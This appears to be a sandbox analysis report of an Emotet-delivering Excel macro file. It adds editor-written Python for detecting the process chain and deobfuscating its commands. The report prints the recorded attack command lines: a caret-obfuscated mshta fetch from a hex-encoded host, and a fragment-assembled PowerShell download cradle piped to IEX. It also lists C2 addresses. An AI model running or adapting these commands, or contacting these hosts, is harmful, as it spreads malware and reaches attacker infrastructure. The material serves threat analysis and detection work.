Analysis
max time kernel: 147s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-en-20220112
submitted: 19-01-2022 10:06
Behavioral task: behavioral1 (Sample: 086135335.xlsm, Resource: win7-en-20211208)
The signature, process-tree and memory-dump entries below reference behavioral2, the windows10-2004_x64 run named in the header (Office16 install path, WerFault.exe -pss crash handling); behavioral1 is the win7-en-20211208 run of the same sample.
General
Target: 086135335.xlsm
Size: 114KB
MD5: 254ffcdec7238f1444fe24932ce54457
SHA1: f279f9375c94edc055cb29d3d511c2b984eea05a
SHA256: bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc
SHA512: 559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a
Malware Config
Extracted URL: http://0x5cff39c3/sec/sec.html (stage 1, fetched by mshta.exe; the host is the IPv4 address 92.255.57.195 written as a single hexadecimal integer, 0x5c.0xff.0x39.0xc3, a form the sandbox shows mshta.exe resolving but that a dotted-quad IoC match on the URL string will miss)
Extracted URL: http://92.255.57.195/sec/sec.png (stage 2, fetched by the PowerShell download cradle; same host as stage 1)
Extracted: emotet, botnet Epoch5
C2 list (IP:port):
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
  pid: 2752 (cmd.exe)    pid_target: 1688 (EXCEL.EXE)
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (1 IoC)
Processes:
  resource: behavioral2/memory/1644-171-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp (powershell.exe, PID 1644)    yara_rule: family_redline
The only RedLine evidence in this report is this single YARA hit on a 385.4MB powershell.exe memory region. The extracted configuration, the C2 list and the Suricata alerts all identify Emotet, and no RedLine binary appears among the dropped files, so treat the RedLine attribution as unconfirmed until the flagged region has been inspected.
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
Processes:
  PID 1316 (WerFault.exe) created a process with parent 3148 (mshta.exe)
Read this together with the "Program crash" entry below and the depth-1 WerFault.exe -pss entry in the process tree: mshta.exe (PID 3148) crashed and Windows Error Reporting snapshotted it. The other-parent creation is most plausibly part of that crash handling rather than a parent-PID spoofing step by the payload.
suricata: ET MALWARE W32/Emotet CnC Beacon 3
Blocklisted process makes network request (5 IoCs)
Processes:
  flow 19    pid 3148    mshta.exe
  flow 31    pid 1644    powershell.exe
  flow 34    pid 1644    powershell.exe
  flow 38    pid 2580    rundll32.exe
  flow 39    pid 2580    rundll32.exe
Downloads MZ/PE file
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  Key value queried    \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation    mshta.exe
Loads dropped DLL (4 IoCs)
Processes:
  3764 rundll32.exe
  1468 rundll32.exe
  1544 rundll32.exe
  2580 rundll32.exe
Drops file in System32 directory (1 IoC)
Processes:
  File opened for modification    C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku    rundll32.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description adds "Likely ransomware behaviour", but no encryption or ransom-note activity appears anywhere in this report, and drive enumeration is also ordinary host reconnaissance; do not read this entry alone as evidence of ransomware.
Program crash (1 IoC)
Processes:
  1072 WerFault.exe    target 3148 mshta.exe
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  Key opened           \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                        EXCEL.EXE
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                   EXCEL.EXE
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString    EXCEL.EXE
  Key opened           \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                        WerFault.exe
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                   WerFault.exe
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString    WerFault.exe
Enumerates system info in registry (2 TTPs, 5 IoCs)
Processes:
  Key opened           \REGISTRY\MACHINE\Hardware\Description\System\BIOS                 EXCEL.EXE
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily    EXCEL.EXE
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU       EXCEL.EXE
  Key opened           \REGISTRY\MACHINE\Hardware\Description\System\BIOS                 WerFault.exe
  Key value queried    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU       WerFault.exe
Both of these hits come only from EXCEL.EXE and WerFault.exe, not from the mshta, powershell or rundll32 stages, so they are most plausibly the Microsoft binaries' own telemetry and crash-report collection rather than sandbox evasion by the payload.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  1688 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (events per process):
  1644 powershell.exe    (2)
  1072 WerFault.exe      (2)
  2580 rundll32.exe      (2)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  Token: SeDebugPrivilege    1644 powershell.exe
Suspicious use of SetWindowsHookEx (14 IoCs)
Processes:
  1688 EXCEL.EXE    (14 events)
Suspicious use of WriteProcessMemory (22 IoCs)
Processes (writer -> target, number of events):
  1688 EXCEL.EXE        -> 2752 cmd.exe           (2)
  2752 cmd.exe          -> 3148 mshta.exe         (2)
  3148 mshta.exe        -> 1644 powershell.exe    (2)
  1316 WerFault.exe     -> 3148 mshta.exe         (2)
  1644 powershell.exe   -> 3412 cmd.exe           (2)
  3412 cmd.exe          -> 3764 rundll32.exe      (3)
  3764 rundll32.exe     -> 1468 rundll32.exe      (3)
  1468 rundll32.exe     -> 1544 rundll32.exe      (3)
  1544 rundll32.exe     -> 2580 rundll32.exe      (3)
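The "Process spawned unexpected child process" and WriteProcessMemory entries above describe a parent/child chain that is easy to alert on from process-creation telemetry. The following is an added example written by the editor, not code from the sandbox or from this report: a handful of parent/child and command-line rules run over constructed Sysmon-style process-create events whose PIDs, images and command lines are copied from the process tree in this report. The ProcEvent field subset, the rule names, the OFFICE_APPS/SCRIPT_HOSTS/USER_WRITABLE lists and the ppid 0 given to EXCEL.EXE are the editor's assumptions; the powershell.exe command line keeps only the $c3 fragment and the IEX pipe.

```python
"""Added example (editor's code, not from the sandbox report): parent/child
rules that fire on the Excel -> cmd -> mshta -> powershell -> rundll32 chain
recorded in this report, evaluated over constructed process-create events."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Assumed subset of Sysmon Event ID 1 (ProcessCreate) fields."""
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# Locations a standard user can write to; rundll32 loading a module from here is suspect.
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\", "\\temp\\", "c:\\programdata\\")
_RUNDLL_ARG = re.compile(r'rundll32\.exe\s+"?([^",]+)"?\s*,\s*(\S+)', re.IGNORECASE)
_IEX_RE = re.compile(r"\biex\b|invoke-expression")

# Constructed sample telemetry: PIDs, images and command lines as shown in the
# process tree of this report; EXCEL.EXE is given ppid 0 as the root.
EVENTS = [
    ProcEvent(1688, 0, "C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE",
              '"C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE" '
              '"C:\\Users\\Admin\\AppData\\Local\\Temp\\086135335.xlsm"'),
    ProcEvent(2752, 1688, "C:\\Windows\\SYSTEM32\\cmd.exe",
              "cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html"),
    ProcEvent(3148, 2752, "C:\\Windows\\system32\\mshta.exe",
              "mshta http://0x5cff39c3/sec/sec.html"),
    ProcEvent(1644, 3148, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noexit '
              "$c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp"
              "{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');"
              "$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"),
    ProcEvent(3412, 1644, "C:\\Windows\\system32\\cmd.exe",
              '"C:\\Windows\\system32\\cmd.exe" /c C:\\Windows\\SysWow64\\rundll32.exe '
              "C:\\Users\\Public\\Documents\\ssd.dll,AnyString"),
    ProcEvent(3764, 3412, "C:\\Windows\\SysWow64\\rundll32.exe",
              "C:\\Windows\\SysWow64\\rundll32.exe C:\\Users\\Public\\Documents\\ssd.dll,AnyString"),
    ProcEvent(1468, 3764, "C:\\Windows\\SysWOW64\\rundll32.exe",
              'C:\\Windows\\SysWOW64\\rundll32.exe "C:\\Users\\Public\\Documents\\ssd.dll",DllRegisterServer'),
    ProcEvent(1544, 1468, "C:\\Windows\\SysWOW64\\rundll32.exe",
              'C:\\Windows\\SysWOW64\\rundll32.exe "C:\\Windows\\SysWOW64\\Iowdvjqb\\kclggbsegem.tku",FUBgEnAdK'),
    ProcEvent(2580, 1544, "C:\\Windows\\SysWOW64\\rundll32.exe",
              'C:\\Windows\\SysWOW64\\rundll32.exe "C:\\Windows\\System32\\Iowdvjqb\\kclggbsegem.tku",DllRegisterServer'),
]


def _base(image: str) -> str:
    return ntpath.basename(image).lower()


def office_ancestor_depth(event: ProcEvent, by_pid: dict) -> int:
    """Hops up the parent chain to the nearest Office application, 0 if none."""
    depth, cur = 0, event
    while cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        depth += 1
        if _base(cur.image) in OFFICE_APPS:
            return depth
    return 0


def analyse(events):
    """Return (rule, pid) pairs for every rule that fires."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = _base(e.image)
        if name not in SCRIPT_HOSTS:
            continue
        depth = office_ancestor_depth(e, by_pid)
        if depth == 1:
            alerts.append(("office_spawns_script_host", e.pid))
        elif depth > 1:
            alerts.append(("office_descendant_script_host", e.pid))
        # cmd.exe strips ^ before execution; carets between letters exist only
        # to defeat substring matching on the logged command line.
        if name == "cmd.exe" and "^" in e.cmdline:
            alerts.append(("cmd_caret_obfuscation", e.pid))
        if name == "powershell.exe":
            norm = e.cmdline.replace("`", "").lower()  # I`E`X -> iex
            if _IEX_RE.search(norm) and ".replace(" in norm:
                alerts.append(("powershell_string_assembly_iex", e.pid))
        if name == "rundll32.exe":
            m = _RUNDLL_ARG.search(e.cmdline)
            if m:
                module = m.group(1).lower()
                if not module.endswith(".dll") or any(p in module for p in USER_WRITABLE):
                    alerts.append(("rundll32_untrusted_module", e.pid))
    return alerts


def pids_with_literal_http(events):
    """PIDs whose raw command line contains 'http' as a contiguous substring."""
    return [e.pid for e in events if "http" in e.cmdline.lower()]


if __name__ == "__main__":
    for rule, pid in analyse(EVENTS):
        print(f"{rule:32s} pid={pid}")
    print("literal 'http' seen in:", pids_with_literal_http(EVENTS))
```

Only the mshta stage (PID 3148) carries a contiguous "http" in its command line; the cmd stage hides it behind carets and the PowerShell stage behind {GOOGLE} fillers, which is why the rules above key on ancestry, on the presence of the escape characters themselves and on rundll32's module path rather than on the URL.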
Processes
depth 1: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  command: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\086135335.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  depth 2: C:\Windows\SYSTEM32\cmd.exe
    command: cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
    (the carets are cmd.exe escape characters, removed before the command runs; the child's command line below shows the cleaned form)
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    depth 3: C:\Windows\system32\mshta.exe
      command: mshta http://0x5cff39c3/sec/sec.html
      (0x5cff39c3 is 92.255.57.195 as one hexadecimal integer; the fetched sec.html is what spawned the PowerShell stage at depth 4)
      - Blocklisted process makes network request
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        (three fragments padded with the filler {GOOGLE} are each stripped by .replace(), joined in the order $c1,$c4,$c3 and piped to IEX; after stripping, the joined string is (New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/sec.png'), and the backticks in I`E`X are PowerShell escapes that leave the token IEX unchanged)
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        depth 5: C:\Windows\system32\cmd.exe
          command: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
          - Suspicious use of WriteProcessMemory
          depth 6: C:\Windows\SysWow64\rundll32.exe
            command: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
            depth 7: C:\Windows\SysWOW64\rundll32.exe
              command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
              - Loads dropped DLL
              - Drops file in System32 directory
              - Suspicious use of WriteProcessMemory
              depth 8: C:\Windows\SysWOW64\rundll32.exe
                command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku",FUBgEnAdK
                - Loads dropped DLL
                - Suspicious use of WriteProcessMemory
                depth 9: C:\Windows\SysWOW64\rundll32.exe
                  command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Iowdvjqb\kclggbsegem.tku",DllRegisterServer
                  (this is the 32-bit rundll32.exe, so WOW64 file-system redirection maps the System32 path in its command line to the SysWOW64 directory the depth-7 process wrote to; both names refer to the one file hashed under Downloads)
                  - Blocklisted process makes network request
                  - Loads dropped DLL
                  - Suspicious behavior: EnumeratesProcesses
      depth 4: C:\Windows\system32\WerFault.exe
        command: C:\Windows\system32\WerFault.exe -u -p 3148 -s 1724
        - Program crash
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
depth 1: C:\Windows\system32\WerFault.exe
  command: C:\Windows\system32\WerFault.exe -pss -s 408 -p 3148 -ip 3148
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Suspicious use of WriteProcessMemory
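The depth-3 and depth-4 entries in the tree show the two obfuscations an analyst has to undo before the URLs can be matched against the extracted configuration: a host written as a single hex integer, and a download cradle assembled from placeholder-padded fragments. The following is an added example written by the editor, not code from the sandbox, the report or the malware: it parses the `$name='...'.replace('filler', '')` assignments and the `-Join` order out of the powershell.exe command line copied from the tree, reconstructs the string IEX evaluates, and rewrites hex- or decimal-integer hosts to dotted-quad form. The regular expressions, function names and the decimal-host handling (which goes beyond the hex form seen in this sample) are the editor's; the command line itself is the one above with the image path and `-noexit` omitted.

```python
"""Added example (editor's code, not part of the sandbox report): rebuild the
download cradle from the obfuscated powershell.exe command line in the process
tree, and rewrite the hex-literal host in the mshta URL to dotted-quad form."""
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit

# Copied from the depth-4 powershell.exe entry; the image path and the
# "-noexit" switch are dropped because the parser does not need them.
OBFUSCATED_CMDLINE = (
    "$c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t "
    "N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); "
    "$c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow"
    "{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); "
    "$c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp"
    "{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');"
    "$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)

# $name='<single-quoted body>'.replace('<filler>', '')   ('' is an escaped quote)
_ASSIGN_RE = re.compile(r"\$(\w+)='((?:[^']|'')*)'\.replace\('([^']+)',\s*''\)")
# ($c1,$c4,$c3 -Join '')  -> the order in which the fragments are concatenated
_JOIN_RE = re.compile(r"\(([^()]+?)\s+-Join\s+''\)")
_URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def deobfuscate(cmdline: str) -> str:
    """Apply the .replace() filler removal and the -Join, returning the
    string that IEX finally evaluates."""
    fragments = {}
    for name, body, filler in _ASSIGN_RE.findall(cmdline):
        # Inside a PowerShell single-quoted string '' is a literal single quote.
        fragments[name] = body.replace(filler, "").replace("''", "'")
    m = _JOIN_RE.search(cmdline)
    if not m:
        raise ValueError("no -Join expression found")
    order = [tok.strip().lstrip("$") for tok in m.group(1).split(",")]
    return "".join(fragments[name] for name in order)


def normalise_url(url: str) -> str:
    """Rewrite a URL whose host is an IPv4 address written as one hex
    (0x5cff39c3) or decimal (1560230339) integer into dotted-quad form.
    Any other host, or an out-of-range integer, is returned unchanged."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        if re.fullmatch(r"0x[0-9a-f]+", host):
            addr = ipaddress.IPv4Address(int(host, 16))
        elif host.isdigit():
            addr = ipaddress.IPv4Address(int(host))
        else:
            return url
    except ValueError:
        return url
    netloc = str(addr) + (f":{parts.port}" if parts.port else "")
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


def stage_urls(mshta_url: str, ps_cmdline: str) -> list:
    """Normalised URLs of both download stages, in execution order."""
    urls = [mshta_url] + _URL_RE.findall(deobfuscate(ps_cmdline))
    return [normalise_url(u) for u in urls]


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED_CMDLINE))
    print(stage_urls("http://0x5cff39c3/sec/sec.html", OBFUSCATED_CMDLINE))
```

Running it yields the two stage URLs on the same host, 92.255.57.195, which is what ties the mshta fetch in the tree to the second "Extracted" entry under Malware Config; match IoCs on the normalised host, not on the URL string as logged.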
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Public\Documents\ssd.dll
  MD5: fcdd109bcdb88089e05aa9dda588ec32
  SHA1: 2ae8c17b9401869aac6db6ceb087eb24083dc317
  SHA256: 634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
  SHA512: 7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku
  MD5: fcdd109bcdb88089e05aa9dda588ec32
  SHA1: 2ae8c17b9401869aac6db6ceb087eb24083dc317
  SHA256: 634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
  SHA512: 7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
The two dropped files carry identical hashes: kclggbsegem.tku is a byte-for-byte copy of ssd.dll placed in a new SysWOW64 subdirectory under a non-.dll extension. One hash-based indicator covers both, whereas a rule keyed on the file name or extension would catch only one of them.
Memory dumps (region, size):
memory/1468-185-0x0000000004B30000-0x0000000004B58000-memory.dmp    160KB
memory/1468-194-0x0000000004F70000-0x0000000004F98000-memory.dmp    160KB
memory/1468-191-0x0000000004F10000-0x0000000004F38000-memory.dmp    160KB
memory/1468-189-0x0000000004C90000-0x0000000004CB8000-memory.dmp    160KB
memory/1468-187-0x0000000004C30000-0x0000000004C58000-memory.dmp    160KB
memory/1544-196-0x00000000042A0000-0x00000000042C8000-memory.dmp    160KB
memory/1644-184-0x000001A4D6A70000-0x000001A4D6AE6000-memory.dmp    472KB
memory/1644-168-0x000001A4D63F0000-0x000001A4D6412000-memory.dmp    136KB
memory/1644-169-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp    385.4MB
memory/1644-171-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp    385.4MB
memory/1644-173-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp    385.4MB
memory/1644-174-0x000001A4D69A0000-0x000001A4D69E4000-memory.dmp    272KB
memory/1688-137-0x00007FFF1D810000-0x00007FFF1D820000-memory.dmp    64KB
memory/1688-131-0x00007FFF20070000-0x00007FFF20080000-memory.dmp    64KB
memory/1688-133-0x00007FFF20070000-0x00007FFF20080000-memory.dmp    64KB
memory/1688-130-0x00007FFF20070000-0x00007FFF20080000-memory.dmp    64KB
memory/1688-132-0x00007FFF20070000-0x00007FFF20080000-memory.dmp    64KB
memory/1688-134-0x00007FFF20070000-0x00007FFF20080000-memory.dmp    64KB
memory/1688-138-0x00007FFF1D810000-0x00007FFF1D820000-memory.dmp    64KB
memory/2580-199-0x0000000004CD0000-0x0000000004CF8000-memory.dmp    160KB
memory/2580-203-0x0000000005580000-0x00000000055A8000-memory.dmp    160KB
memory/2580-205-0x00000000055E0000-0x0000000005608000-memory.dmp    160KB
memory/2580-207-0x0000000005780000-0x00000000057A8000-memory.dmp    160KB
memory/2580-209-0x00000000057E0000-0x0000000005808000-memory.dmp    160KB
memory/2580-211-0x00000000058E0000-0x0000000005908000-memory.dmp    160KB
memory/2580-213-0x00000000059C0000-0x00000000059E8000-memory.dmp    160KB
memory/3764-177-0x0000000004DA0000-0x0000000004DC8000-memory.dmp    160KB